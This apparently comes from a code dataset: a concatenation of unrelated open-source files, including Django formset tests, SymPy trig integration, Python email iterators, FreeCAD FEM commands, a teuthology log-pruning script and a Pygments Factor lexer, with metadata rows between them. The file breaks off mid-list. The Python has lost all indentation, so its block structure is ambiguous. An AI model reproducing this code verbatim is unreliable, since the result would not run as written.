# a formset for a Model that has a custom primary key that still needs to be
# added to the formset automatically
FormSet = modelformset_factory(ClassyMexicanRestaurant, fields=["tacos_are_yummy"])
self.assertEqual(sorted(FormSet().forms[0].fields.keys()), ['restaurant', 'tacos_are_yummy'])
def test_prevent_duplicates_from_with_the_same_formset(self):
FormSet = modelformset_factory(Product, extra=2)
data = {
'form-TOTAL_FORMS': 2,
'form-INITIAL_FORMS': 0,
'form-MAX_NUM_FORMS': '',
'form-0-slug': 'red_car',
'form-1-slug': 'red_car',
}
formset = FormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual(formset._non_form_errors,
['Please correct the duplicate data for slug.'])
FormSet = modelformset_factory(Price, extra=2)
data = {
'form-TOTAL_FORMS': 2,
'form-INITIAL_FORMS': 0,
'form-MAX_NUM_FORMS': '',
'form-0-price': '25',
'form-0-quantity': '7',
'form-1-price': '25',
'form-1-quantity': '7',
}
formset = FormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual(formset._non_form_errors,
['Please correct the duplicate data for price and quantity, which must be unique.'])
# Only the price field is specified, this should skip any unique checks since
# the unique_together is not fulfilled. This will fail with a KeyError if broken.
FormSet = modelformset_factory(Price, fields=("price",), extra=2)
data = {
'form-TOTAL_FORMS': '2',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-price': '24',
'form-1-price': '24',
}
formset = FormSet(data)
self.assertTrue(formset.is_valid())
FormSet = inlineformset_factory(Author, Book, extra=0)
author = Author.objects.create(pk=1, name='Charles Baudelaire')
book1 = Book.objects.create(pk=1, author=author, title='Les Paradis Artificiels')
book2 = Book.objects.create(pk=2, author=author, title='Les Fleurs du Mal')
book3 = Book.objects.create(pk=3, author=author, title='Flowers of Evil')
book_ids = author.book_set.order_by('id').values_list('id', flat=True)
data = {
'book_set-TOTAL_FORMS': '2',
'book_set-INITIAL_FORMS': '2',
'book_set-MAX_NUM_FORMS': '',
'book_set-0-title': 'The 2008 Election',
'book_set-0-author': str(author.id),
'book_set-0-id': str(book_ids[0]),
'book_set-1-title': 'The 2008 Election',
'book_set-1-author': str(author.id),
'book_set-1-id': str(book_ids[1]),
}
formset = FormSet(data=data, instance=author)
self.assertFalse(formset.is_valid())
self.assertEqual(formset._non_form_errors,
['Please correct the duplicate data for title.'])
self.assertEqual(formset.errors,
[{}, {'__all__': ['Please correct the duplicate values below.']}])
FormSet = modelformset_factory(Post, extra=2)
data = {
'form-TOTAL_FORMS': '2',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-title': 'blah',
'form-0-slug': 'Morning',
'form-0-subtitle': 'foo',
'form-0-posted': '2009-01-01',
'form-1-title': 'blah',
'form-1-slug': 'Morning in Prague',
'form-1-subtitle': 'rawr',
'form-1-posted': '2009-01-01'
}
formset = FormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual(formset._non_form_errors,
['Please correct the duplicate data for title which must be unique for the date in posted.'])
self.assertEqual(formset.errors,
[{}, {'__all__': ['Please correct the duplicate values below.']}])
data = {
'form-TOTAL_FORMS': '2',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-title': 'foo',
'form-0-slug': 'Morning in Prague',
'form-0-subtitle': 'foo',
'form-0-posted': '2009-01-01',
'form-1-title': 'blah',
'form-1-slug': 'Morning in Prague',
'form-1-subtitle': 'rawr',
'form-1-posted': '2009-08-02'
}
formset = FormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual(formset._non_form_errors,
['Please correct the duplicate data for slug which must be unique for the year in posted.'])
data = {
'form-TOTAL_FORMS': '2',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-title': 'foo',
'form-0-slug': 'Morning in Prague',
'form-0-subtitle': 'rawr',
'form-0-posted': '2008-08-01',
'form-1-title': 'blah',
'form-1-slug': 'Prague',
'form-1-subtitle': 'rawr',
'form-1-posted': '2009-08-02'
}
formset = FormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual(formset._non_form_errors,
['Please correct the duplicate data for subtitle which must be unique for the month in posted.'])
| agpl-3.0 | 7,439,276,844,429,428,000 | 50.409396 | 381 | 0.602529 | false |
hargup/sympy | sympy/integrals/trigonometry.py | 83 | 10631 | # -*- coding: utf-8 -*-
from __future__ import print_function, division
from sympy.core.compatibility import range
from sympy.core import cacheit, Dummy, Eq, Integer, Rational, S, Wild
from sympy.functions import binomial, sin, cos, Piecewise
# TODO sin(a*x)*cos(b*x) -> sin((a+b)x) + sin((a-b)x) ?
# creating, each time, Wild's and sin/cos/Mul is expensive. Also, our match &
# subs are very slow when not cached, and if we create Wild each time, we
# effectively block caching.
#
# so we cache the pattern
# need to use a function instead of lamda since hash of lambda changes on
# each call to _pat_sincos
def _integer_instance(n):
return isinstance(n , Integer)
@cacheit
def _pat_sincos(x):
a = Wild('a', exclude=[x])
n, m = [Wild(s, exclude=[x], properties=[_integer_instance])
for s in 'nm']
pat = sin(a*x)**n * cos(a*x)**m
return pat, a, n, m
_u = Dummy('u')
def trigintegrate(f, x, conds='piecewise'):
"""Integrate f = Mul(trig) over x
>>> from sympy import Symbol, sin, cos, tan, sec, csc, cot
>>> from sympy.integrals.trigonometry import trigintegrate
>>> from sympy.abc import x
>>> trigintegrate(sin(x)*cos(x), x)
sin(x)**2/2
>>> trigintegrate(sin(x)**2, x)
x/2 - sin(x)*cos(x)/2
>>> trigintegrate(tan(x)*sec(x), x)
1/cos(x)
>>> trigintegrate(sin(x)*tan(x), x)
-log(sin(x) - 1)/2 + log(sin(x) + 1)/2 - sin(x)
http://en.wikibooks.org/wiki/Calculus/Integration_techniques
See Also
========
sympy.integrals.integrals.Integral.doit
sympy.integrals.integrals.Integral
"""
from sympy.integrals.integrals import integrate
pat, a, n, m = _pat_sincos(x)
f = f.rewrite('sincos')
M = f.match(pat)
if M is None:
return
n, m = M[n], M[m]
if n is S.Zero and m is S.Zero:
return x
zz = x if n is S.Zero else S.Zero
a = M[a]
if n.is_odd or m.is_odd:
u = _u
n_, m_ = n.is_odd, m.is_odd
# take smallest n or m -- to choose simplest substitution
if n_ and m_:
n_ = n_ and (n < m) # NB: careful here, one of the
m_ = m_ and not (n < m) # conditions *must* be true
# n m u=C (n-1)/2 m
# S(x) * C(x) dx --> -(1-u^2) * u du
if n_:
ff = -(1 - u**2)**((n - 1)/2) * u**m
uu = cos(a*x)
# n m u=S n (m-1)/2
# S(x) * C(x) dx --> u * (1-u^2) du
elif m_:
ff = u**n * (1 - u**2)**((m - 1)/2)
uu = sin(a*x)
fi = integrate(ff, u) # XXX cyclic deps
fx = fi.subs(u, uu)
if conds == 'piecewise':
return Piecewise((zz, Eq(a, 0)), (fx / a, True))
return fx / a
# n & m are both even
#
# 2k 2m 2l 2l
# we transform S (x) * C (x) into terms with only S (x) or C (x)
#
# example:
# 100 4 100 2 2 100 4 2
# S (x) * C (x) = S (x) * (1-S (x)) = S (x) * (1 + S (x) - 2*S (x))
#
# 104 102 100
# = S (x) - 2*S (x) + S (x)
# 2k
# then S is integrated with recursive formula
# take largest n or m -- to choose simplest substitution
n_ = (abs(n) > abs(m))
m_ = (abs(m) > abs(n))
res = S.Zero
if n_:
# 2k 2 k i 2i
# C = (1 - S ) = sum(i, (-) * B(k, i) * S )
if m > 0:
for i in range(0, m//2 + 1):
res += ((-1)**i * binomial(m//2, i) *
_sin_pow_integrate(n + 2*i, x))
elif m == 0:
res = _sin_pow_integrate(n, x)
else:
# m < 0 , |n| > |m|
# /
# |
# | m n
# | cos (x) sin (x) dx =
# |
# |
#/
# /
# |
# -1 m+1 n-1 n - 1 | m+2 n-2
# ________ cos (x) sin (x) + _______ | cos (x) sin (x) dx
# |
# m + 1 m + 1 |
# /
res = (Rational(-1, m + 1) * cos(x)**(m + 1) * sin(x)**(n - 1) +
Rational(n - 1, m + 1) *
trigintegrate(cos(x)**(m + 2)*sin(x)**(n - 2), x))
elif m_:
# 2k 2 k i 2i
# S = (1 - C ) = sum(i, (-) * B(k, i) * C )
if n > 0:
# / /
# | |
# | m n | -m n
# | cos (x)*sin (x) dx or | cos (x) * sin (x) dx
# | |
# / /
#
# |m| > |n| ; m, n >0 ; m, n belong to Z - {0}
# n 2
# sin (x) term is expanded here in terms of cos (x),
# and then integrated.
#
for i in range(0, n//2 + 1):
res += ((-1)**i * binomial(n//2, i) *
_cos_pow_integrate(m + 2*i, x))
elif n == 0:
# /
# |
# | 1
# | _ _ _
# | m
# | cos (x)
# /
#
res = _cos_pow_integrate(m, x)
else:
# n < 0 , |m| > |n|
# /
# |
# | m n
# | cos (x) sin (x) dx =
# |
# |
#/
# /
# |
# 1 m-1 n+1 m - 1 | m-2 n+2
# _______ cos (x) sin (x) + _______ | cos (x) sin (x) dx
# |
# n + 1 n + 1 |
# /
res = (Rational(1, n + 1) * cos(x)**(m - 1)*sin(x)**(n + 1) +
Rational(m - 1, n + 1) *
trigintegrate(cos(x)**(m - 2)*sin(x)**(n + 2), x))
else:
if m == n:
##Substitute sin(2x)/2 for sin(x)cos(x) and then Integrate.
res = integrate((Rational(1, 2)*sin(2*x))**m, x)
elif (m == -n):
if n < 0:
# Same as the scheme described above.
# the function argument to integrate in the end will
# be 1 , this cannot be integrated by trigintegrate.
# Hence use sympy.integrals.integrate.
res = (Rational(1, n + 1) * cos(x)**(m - 1) * sin(x)**(n + 1) +
Rational(m - 1, n + 1) *
integrate(cos(x)**(m - 2) * sin(x)**(n + 2), x))
else:
res = (Rational(-1, m + 1) * cos(x)**(m + 1) * sin(x)**(n - 1) +
Rational(n - 1, m + 1) *
integrate(cos(x)**(m + 2)*sin(x)**(n - 2), x))
if conds == 'piecewise':
return Piecewise((zz, Eq(a, 0)), (res.subs(x, a*x) / a, True))
return res.subs(x, a*x) / a
def _sin_pow_integrate(n, x):
if n > 0:
if n == 1:
#Recursion break
return -cos(x)
# n > 0
# / /
# | |
# | n -1 n-1 n - 1 | n-2
# | sin (x) dx = ______ cos (x) sin (x) + _______ | sin (x) dx
# | |
# | n n |
#/ /
#
#
return (Rational(-1, n) * cos(x) * sin(x)**(n - 1) +
Rational(n - 1, n) * _sin_pow_integrate(n - 2, x))
if n < 0:
if n == -1:
##Make sure this does not come back here again.
##Recursion breaks here or at n==0.
return trigintegrate(1/sin(x), x)
# n < 0
# / /
# | |
# | n 1 n+1 n + 2 | n+2
# | sin (x) dx = _______ cos (x) sin (x) + _______ | sin (x) dx
# | |
# | n + 1 n + 1 |
#/ /
#
return (Rational(1, n + 1) * cos(x) * sin(x)**(n + 1) +
Rational(n + 2, n + 1) * _sin_pow_integrate(n + 2, x))
else:
#n == 0
#Recursion break.
return x
def _cos_pow_integrate(n, x):
if n > 0:
if n == 1:
#Recursion break.
return sin(x)
# n > 0
# / /
# | |
# | n 1 n-1 n - 1 | n-2
# | sin (x) dx = ______ sin (x) cos (x) + _______ | cos (x) dx
# | |
# | n n |
#/ /
#
return (Rational(1, n) * sin(x) * cos(x)**(n - 1) +
Rational(n - 1, n) * _cos_pow_integrate(n - 2, x))
if n < 0:
if n == -1:
##Recursion break
return trigintegrate(1/cos(x), x)
# n < 0
# / /
# | |
# | n -1 n+1 n + 2 | n+2
# | cos (x) dx = _______ sin (x) cos (x) + _______ | cos (x) dx
# | |
# | n + 1 n + 1 |
#/ /
#
return (Rational(-1, n + 1) * sin(x) * cos(x)**(n + 1) +
Rational(n + 2, n + 1) * _cos_pow_integrate(n + 2, x))
else:
# n == 0
#Recursion Break.
return x
| bsd-3-clause | -6,437,232,332,191,155,000 | 32.642405 | 80 | 0.312859 | false |
buqing2009/MissionPlanner | Lib/email/iterators.py | 68 | 2275 | # Copyright (C) 2001-2006 Python Software Foundation
# Author: Barry Warsaw
# Contact: [email protected]
"""Various types of useful iterators and generators."""
__all__ = [
'body_line_iterator',
'typed_subpart_iterator',
'walk',
# Do not include _structure() since it's part of the debugging API.
]
import sys
from cStringIO import StringIO
# This function will become a method of the Message class
def walk(self):
"""Walk over the message tree, yielding each subpart.
The walk is performed in depth-first order. This method is a
generator.
"""
yield self
if self.is_multipart():
for subpart in self.get_payload():
for subsubpart in subpart.walk():
yield subsubpart
# These two functions are imported into the Iterators.py interface module.
def body_line_iterator(msg, decode=False):
"""Iterate over the parts, returning string payloads line-by-line.
Optional decode (default False) is passed through to .get_payload().
"""
for subpart in msg.walk():
payload = subpart.get_payload(decode=decode)
if isinstance(payload, basestring):
for line in StringIO(payload):
yield line
def typed_subpart_iterator(msg, maintype='text', subtype=None):
"""Iterate over the subparts with a given MIME type.
Use `maintype' as the main MIME type to match against; this defaults to
"text". Optional `subtype' is the MIME subtype to match against; if
omitted, only the main type is matched.
"""
for subpart in msg.walk():
if subpart.get_content_maintype() == maintype:
if subtype is None or subpart.get_content_subtype() == subtype:
yield subpart
def _structure(msg, fp=None, level=0, include_default=False):
"""A handy debugging aid"""
if fp is None:
fp = sys.stdout
tab = ' ' * (level * 4)
print >> fp, tab + msg.get_content_type(),
if include_default:
print >> fp, '[%s]' % msg.get_default_type()
else:
print >> fp
if msg.is_multipart():
for subpart in msg.get_payload():
_structure(subpart, fp, level+1, include_default)
| gpl-3.0 | -5,882,983,571,060,583,000 | 27.973684 | 75 | 0.62022 | false |
maurerpe/FreeCAD | src/Mod/Fem/FemCommands.py | 3 | 6302 | #***************************************************************************
#* *
#* Copyright (c) 2015 - FreeCAD Developers *
#* Author (c) 2015 - Przemo Fiszt < [email protected]> *
#* *
#* This program is free software; you can redistribute it and/or modify *
#* it under the terms of the GNU Lesser General Public License (LGPL) *
#* as published by the Free Software Foundation; either version 2 of *
#* the License, or (at your option) any later version. *
#* for detail see the LICENCE text file. *
#* *
#* This program is distributed in the hope that it will be useful, *
#* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#* GNU Library General Public License for more details. *
#* *
#* You should have received a copy of the GNU Library General Public *
#* License along with this program; if not, write to the Free Software *
#* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
#* USA *
#* *
#***************************************************************************
__title__ = "Fem Commands"
__author__ = "Przemo Firszt"
__url__ = "http://www.freecadweb.org"
import FreeCAD
if FreeCAD.GuiUp:
import FreeCADGui
import FemGui
from PySide import QtCore
class FemCommands(object):
def __init__(self):
self.resources = {'Pixmap': 'fem-frequency-analysis',
'MenuText': QtCore.QT_TRANSLATE_NOOP("Fem_Command", "Default Fem Command MenuText"),
'Accel': "",
'ToolTip': QtCore.QT_TRANSLATE_NOOP("Fem_Command", "Default Fem Command ToolTip")}
#FIXME add option description
self.is_active = None
def GetResources(self):
return self.resources
def IsActive(self):
if not self.is_active:
active = False
elif self.is_active == 'with_document':
active = FreeCADGui.ActiveDocument is not None
elif self.is_active == 'with_analysis':
active = FemGui.getActiveAnalysis() is not None and self.active_analysis_in_active_doc()
elif self.is_active == 'with_results':
active = FemGui.getActiveAnalysis() is not None and self.active_analysis_in_active_doc() and self.results_present()
elif self.is_active == 'with_part_feature':
active = FreeCADGui.ActiveDocument is not None and self.part_feature_selected()
elif self.is_active == 'with_solver':
active = FemGui.getActiveAnalysis() is not None and self.active_analysis_in_active_doc() and self.solver_selected()
elif self.is_active == 'with_analysis_without_solver':
active = FemGui.getActiveAnalysis() is not None and self.active_analysis_in_active_doc() and not self.analysis_has_solver()
return active
def results_present(self):
results = False
analysis_members = FemGui.getActiveAnalysis().Member
for o in analysis_members:
if o.isDerivedFrom('Fem::FemResultObject'):
results = True
return results
def part_feature_selected(self):
sel = FreeCADGui.Selection.getSelection()
if len(sel) == 1 and sel[0].isDerivedFrom("Part::Feature"):
return True
else:
return False
def active_analysis_in_active_doc(self):
return FemGui.getActiveAnalysis().Document is FreeCAD.ActiveDocument
def solver_selected(self):
sel = FreeCADGui.Selection.getSelection()
if len(sel) == 1 and sel[0].isDerivedFrom("Fem::FemSolverObjectPython"):
return True
else:
return False
def analysis_has_solver(self):
solver = False
analysis_members = FemGui.getActiveAnalysis().Member
for o in analysis_members:
if o.isDerivedFrom("Fem::FemSolverObjectPython"):
solver = True
if solver is True:
return True
else:
return False
def hide_parts_constraints_show_meshes(self):
if FreeCAD.GuiUp:
for acnstrmesh in FemGui.getActiveAnalysis().Member:
#if "Constraint" in acnstrmesh.TypeId:
# acnstrmesh.ViewObject.Visibility = False
if "Mesh" in acnstrmesh.TypeId:
aparttoshow = acnstrmesh.Name.replace("_Mesh", "")
for apart in FreeCAD.activeDocument().Objects:
if aparttoshow == apart.Name:
apart.ViewObject.Visibility = False
acnstrmesh.ViewObject.Visibility = True # OvG: Hide constraints and parts and show meshes
def hide_meshes_show_parts_constraints(self):
if FreeCAD.GuiUp:
for acnstrmesh in FemGui.getActiveAnalysis().Member:
if "Constraint" in acnstrmesh.TypeId:
acnstrmesh.ViewObject.Visibility = True
if "Mesh" in acnstrmesh.TypeId:
aparttoshow = acnstrmesh.Name.replace("_Mesh", "")
for apart in FreeCAD.activeDocument().Objects:
if aparttoshow == apart.Name:
apart.ViewObject.Visibility = True
acnstrmesh.ViewObject.Visibility = False # OvG: Hide meshes and show constraints and meshed part e.g. on purging results
| lgpl-2.1 | 502,027,295,243,265,300 | 50.235772 | 145 | 0.515233 | false |
spjmurray/openstack-sentinel | sentinel/api/controllers/network/v2/floatingips.py | 1 | 1120 | # Copyright 2017 DataCentred Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import pecan
import pecan.decorators
from sentinel.api.controllers.base import BaseController
from sentinel.scope import Scope
class NetworkV2FloatingipsController(BaseController):
service = u'network'
resource = u'floatingip'
collection = u'floatingips'
@pecan.expose('json')
@pecan.decorators.accept_noncanonical
def get_all(self):
floatingips = Scope.filter(self.network.list_floatingips())
return self.format_collection(floatingips, links=False)
# vi: ts=4 et:
| apache-2.0 | -5,755,952,018,048,773,000 | 31 | 78 | 0.733036 | false |
xiandiancloud/ji | common/djangoapps/user_api/tests/test_models.py | 52 | 1757 | from django.db import IntegrityError
from django.test import TestCase
from student.tests.factories import UserFactory
from user_api.tests.factories import UserPreferenceFactory
from user_api.models import UserPreference
class UserPreferenceModelTest(TestCase):
def test_duplicate_user_key(self):
user = UserFactory.create()
UserPreferenceFactory.create(user=user, key="testkey", value="first")
self.assertRaises(
IntegrityError,
UserPreferenceFactory.create,
user=user,
key="testkey",
value="second"
)
def test_arbitrary_values(self):
user = UserFactory.create()
UserPreferenceFactory.create(user=user, key="testkey0", value="")
UserPreferenceFactory.create(user=user, key="testkey1", value="This is some English text!")
UserPreferenceFactory.create(user=user, key="testkey2", value="{'some': 'json'}")
UserPreferenceFactory.create(
user=user,
key="testkey3",
value="\xe8\xbf\x99\xe6\x98\xaf\xe4\xb8\xad\xe5\x9b\xbd\xe6\x96\x87\xe5\xad\x97'"
)
def test_get_set_preference(self):
# Checks that you can set a preference and get that preference later
# Also, tests that no preference is returned for keys that are not set
user = UserFactory.create()
key = 'testkey'
value = 'testvalue'
# does a round trip
UserPreference.set_preference(user, key, value)
pref = UserPreference.get_preference(user, key)
self.assertEqual(pref, value)
# get preference for key that doesn't exist for user
pref = UserPreference.get_preference(user, 'testkey_none')
self.assertIsNone(pref)
| agpl-3.0 | 6,458,343,760,129,347,000 | 36.382979 | 99 | 0.656801 | false |
caibo2014/teuthology | teuthology/prune.py | 3 | 4784 | import logging
import os
import shutil
import time
import teuthology
from teuthology.contextutil import safe_while
log = logging.getLogger(__name__)
# If we see this in any directory, we do not prune it
PRESERVE_FILE = '.preserve'
def main(args):
"""
Main function; parses args and calls prune_archive()
"""
verbose = args['--verbose']
if verbose:
teuthology.log.setLevel(logging.DEBUG)
archive_dir = args['--archive']
dry_run = args['--dry-run']
pass_days = int(args['--pass'])
remotes_days = int(args['--remotes'])
prune_archive(archive_dir, pass_days, remotes_days, dry_run)
def prune_archive(archive_dir, pass_days, remotes_days, dry_run=False):
"""
Walk through the archive_dir, calling the cleanup functions to process
directories that might be old enough
"""
max_days = max(pass_days, remotes_days)
run_dirs = list()
log.debug("Archive {archive} has {count} children".format(
archive=archive_dir, count=len(os.listdir(archive_dir))))
for child in listdir(archive_dir):
item = os.path.join(archive_dir, child)
# Ensure that the path is not a symlink, is a directory, and is old
# enough to process
if (not os.path.islink(item) and os.path.isdir(item) and
is_old_enough(item, max_days)):
run_dirs.append(item)
for run_dir in run_dirs:
log.debug("Processing %s ..." % run_dir)
maybe_remove_passes(run_dir, pass_days, dry_run)
maybe_remove_remotes(run_dir, remotes_days, dry_run)
def listdir(path):
with safe_while(sleep=1, increment=1, tries=10) as proceed:
while proceed():
try:
return os.listdir(path)
except OSError:
log.exception("Failed to list %s !" % path)
def should_preserve(dir_name):
"""
Should the directory be preserved?
:returns: True if the directory contains a file named '.preserve'; False
otherwise
"""
preserve_path = os.path.join(dir_name, PRESERVE_FILE)
if os.path.isdir(dir_name) and os.path.exists(preserve_path):
return True
return False
def is_old_enough(file_name, days):
"""
:returns: True if the file's modification date is earlier than the amount
of days specified
"""
now = time.time()
secs_to_days = lambda s: s / (60 * 60 * 24)
age = now - os.path.getmtime(file_name)
if secs_to_days(age) > days:
return True
return False
def remove(path):
"""
Attempt to recursively remove a directory. If an OSError is encountered,
log it and continue.
"""
try:
shutil.rmtree(path)
except OSError:
log.exception("Failed to remove %s !" % path)
def maybe_remove_passes(run_dir, days, dry_run=False):
"""
Remove entire job log directories if they are old enough and the job passed
"""
if days < 0:
return
contents = listdir(run_dir)
if PRESERVE_FILE in contents:
return
for child in contents:
item = os.path.join(run_dir, child)
# Ensure the path isn't marked for preservation, that it is a
# directory, and that it is old enough
if (should_preserve(item) or not os.path.isdir(item) or not
is_old_enough(item, days)):
continue
# Is it a job dir?
summary_path = os.path.join(item, 'summary.yaml')
if not os.path.exists(summary_path):
continue
# Is it a passed job?
summary_lines = [line.strip() for line in
file(summary_path).readlines()]
if 'success: true' in summary_lines:
log.info("{job} is a {days}-day old passed job; removing".format(
job=item, days=days))
if not dry_run:
remove(item)
def maybe_remove_remotes(run_dir, days, dry_run=False):
"""
Remove remote logs (not teuthology logs) from job directories if they are
old enough
"""
if days < 0:
return
contents = listdir(run_dir)
if PRESERVE_FILE in contents:
return
for child in contents:
item = os.path.join(run_dir, child)
# Ensure the path isn't marked for preservation, that it is a
# directory, and that it is old enough
if (should_preserve(item) or not os.path.isdir(item) or not
is_old_enough(item, days)):
continue
# Does it have a remote subdir?
remote_path = os.path.join(item, 'remote')
if not os.path.isdir(remote_path):
continue
log.info("{job} is {days} days old; removing remote logs".format(
job=item, days=days))
if not dry_run:
remove(remote_path)
| mit | 6,905,389,367,518,952,000 | 30.267974 | 79 | 0.605142 | false |
lucywyman/slides-ii | v/lib/python2.7/site-packages/pygments/lexers/factor.py | 72 | 17864 | # -*- coding: utf-8 -*-
"""
pygments.lexers.factor
~~~~~~~~~~~~~~~~~~~~~~
Lexers for the Factor language.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, bygroups, default, words
from pygments.token import Text, Comment, Keyword, Name, String, Number
__all__ = ['FactorLexer']
class FactorLexer(RegexLexer):
"""
Lexer for the `Factor <http://factorcode.org>`_ language.
.. versionadded:: 1.4
"""
name = 'Factor'
aliases = ['factor']
filenames = ['*.factor']
mimetypes = ['text/x-factor']
flags = re.MULTILINE | re.UNICODE
builtin_kernel = words((
'-rot', '2bi', '2bi@', '2bi*', '2curry', '2dip', '2drop', '2dup', '2keep', '2nip',
'2over', '2tri', '2tri@', '2tri*', '3bi', '3curry', '3dip', '3drop', '3dup', '3keep',
'3tri', '4dip', '4drop', '4dup', '4keep', '<wrapper>', '=', '>boolean', 'clone',
'?', '?execute', '?if', 'and', 'assert', 'assert=', 'assert?', 'bi', 'bi-curry',
'bi-curry@', 'bi-curry*', 'bi@', 'bi*', 'boa', 'boolean', 'boolean?', 'both?',
'build', 'call', 'callstack', 'callstack>array', 'callstack?', 'clear', '(clone)',
'compose', 'compose?', 'curry', 'curry?', 'datastack', 'die', 'dip', 'do', 'drop',
'dup', 'dupd', 'either?', 'eq?', 'equal?', 'execute', 'hashcode', 'hashcode*',
'identity-hashcode', 'identity-tuple', 'identity-tuple?', 'if', 'if*',
'keep', 'loop', 'most', 'new', 'nip', 'not', 'null', 'object', 'or', 'over',
'pick', 'prepose', 'retainstack', 'rot', 'same?', 'swap', 'swapd', 'throw',
'tri', 'tri-curry', 'tri-curry@', 'tri-curry*', 'tri@', 'tri*', 'tuple',
'tuple?', 'unless', 'unless*', 'until', 'when', 'when*', 'while', 'with',
'wrapper', 'wrapper?', 'xor'), suffix=r'\s')
builtin_assocs = words((
'2cache', '<enum>', '>alist', '?at', '?of', 'assoc', 'assoc-all?',
'assoc-any?', 'assoc-clone-like', 'assoc-combine', 'assoc-diff',
'assoc-diff!', 'assoc-differ', 'assoc-each', 'assoc-empty?',
'assoc-filter', 'assoc-filter!', 'assoc-filter-as', 'assoc-find',
'assoc-hashcode', 'assoc-intersect', 'assoc-like', 'assoc-map',
'assoc-map-as', 'assoc-partition', 'assoc-refine', 'assoc-size',
'assoc-stack', 'assoc-subset?', 'assoc-union', 'assoc-union!',
'assoc=', 'assoc>map', 'assoc?', 'at', 'at+', 'at*', 'cache', 'change-at',
'clear-assoc', 'delete-at', 'delete-at*', 'enum', 'enum?', 'extract-keys',
'inc-at', 'key?', 'keys', 'map>assoc', 'maybe-set-at', 'new-assoc', 'of',
'push-at', 'rename-at', 'set-at', 'sift-keys', 'sift-values', 'substitute',
'unzip', 'value-at', 'value-at*', 'value?', 'values', 'zip'), suffix=r'\s')
builtin_combinators = words((
'2cleave', '2cleave>quot', '3cleave', '3cleave>quot', '4cleave',
'4cleave>quot', 'alist>quot', 'call-effect', 'case', 'case-find',
'case>quot', 'cleave', 'cleave>quot', 'cond', 'cond>quot', 'deep-spread>quot',
'execute-effect', 'linear-case-quot', 'no-case', 'no-case?', 'no-cond',
'no-cond?', 'recursive-hashcode', 'shallow-spread>quot', 'spread',
'to-fixed-point', 'wrong-values', 'wrong-values?'), suffix=r'\s')
builtin_math = words((
'-', '/', '/f', '/i', '/mod', '2/', '2^', '<', '<=', '<fp-nan>', '>',
'>=', '>bignum', '>fixnum', '>float', '>integer', '(all-integers?)',
'(each-integer)', '(find-integer)', '*', '+', '?1+',
'abs', 'align', 'all-integers?', 'bignum', 'bignum?', 'bit?', 'bitand',
'bitnot', 'bitor', 'bits>double', 'bits>float', 'bitxor', 'complex',
'complex?', 'denominator', 'double>bits', 'each-integer', 'even?',
'find-integer', 'find-last-integer', 'fixnum', 'fixnum?', 'float',
'float>bits', 'float?', 'fp-bitwise=', 'fp-infinity?', 'fp-nan-payload',
'fp-nan?', 'fp-qnan?', 'fp-sign', 'fp-snan?', 'fp-special?',
'if-zero', 'imaginary-part', 'integer', 'integer>fixnum',
'integer>fixnum-strict', 'integer?', 'log2', 'log2-expects-positive',
'log2-expects-positive?', 'mod', 'neg', 'neg?', 'next-float',
'next-power-of-2', 'number', 'number=', 'number?', 'numerator', 'odd?',
'out-of-fixnum-range', 'out-of-fixnum-range?', 'power-of-2?',
'prev-float', 'ratio', 'ratio?', 'rational', 'rational?', 'real',
'real-part', 'real?', 'recip', 'rem', 'sgn', 'shift', 'sq', 'times',
'u<', 'u<=', 'u>', 'u>=', 'unless-zero', 'unordered?', 'when-zero',
'zero?'), suffix=r'\s')
builtin_sequences = words((
'1sequence', '2all?', '2each', '2map', '2map-as', '2map-reduce', '2reduce',
'2selector', '2sequence', '3append', '3append-as', '3each', '3map', '3map-as',
'3sequence', '4sequence', '<repetition>', '<reversed>', '<slice>', '?first',
'?last', '?nth', '?second', '?set-nth', 'accumulate', 'accumulate!',
'accumulate-as', 'all?', 'any?', 'append', 'append!', 'append-as',
'assert-sequence', 'assert-sequence=', 'assert-sequence?',
'binary-reduce', 'bounds-check', 'bounds-check?', 'bounds-error',
'bounds-error?', 'but-last', 'but-last-slice', 'cartesian-each',
'cartesian-map', 'cartesian-product', 'change-nth', 'check-slice',
'check-slice-error', 'clone-like', 'collapse-slice', 'collector',
'collector-for', 'concat', 'concat-as', 'copy', 'count', 'cut', 'cut-slice',
'cut*', 'delete-all', 'delete-slice', 'drop-prefix', 'each', 'each-from',
'each-index', 'empty?', 'exchange', 'filter', 'filter!', 'filter-as', 'find',
'find-from', 'find-index', 'find-index-from', 'find-last', 'find-last-from',
'first', 'first2', 'first3', 'first4', 'flip', 'follow', 'fourth', 'glue', 'halves',
'harvest', 'head', 'head-slice', 'head-slice*', 'head*', 'head?',
'if-empty', 'immutable', 'immutable-sequence', 'immutable-sequence?',
'immutable?', 'index', 'index-from', 'indices', 'infimum', 'infimum-by',
'insert-nth', 'interleave', 'iota', 'iota-tuple', 'iota-tuple?', 'join',
'join-as', 'last', 'last-index', 'last-index-from', 'length', 'lengthen',
'like', 'longer', 'longer?', 'longest', 'map', 'map!', 'map-as', 'map-find',
'map-find-last', 'map-index', 'map-integers', 'map-reduce', 'map-sum',
'max-length', 'member-eq?', 'member?', 'midpoint@', 'min-length',
'mismatch', 'move', 'new-like', 'new-resizable', 'new-sequence',
'non-negative-integer-expected', 'non-negative-integer-expected?',
'nth', 'nths', 'pad-head', 'pad-tail', 'padding', 'partition', 'pop', 'pop*',
'prefix', 'prepend', 'prepend-as', 'produce', 'produce-as', 'product', 'push',
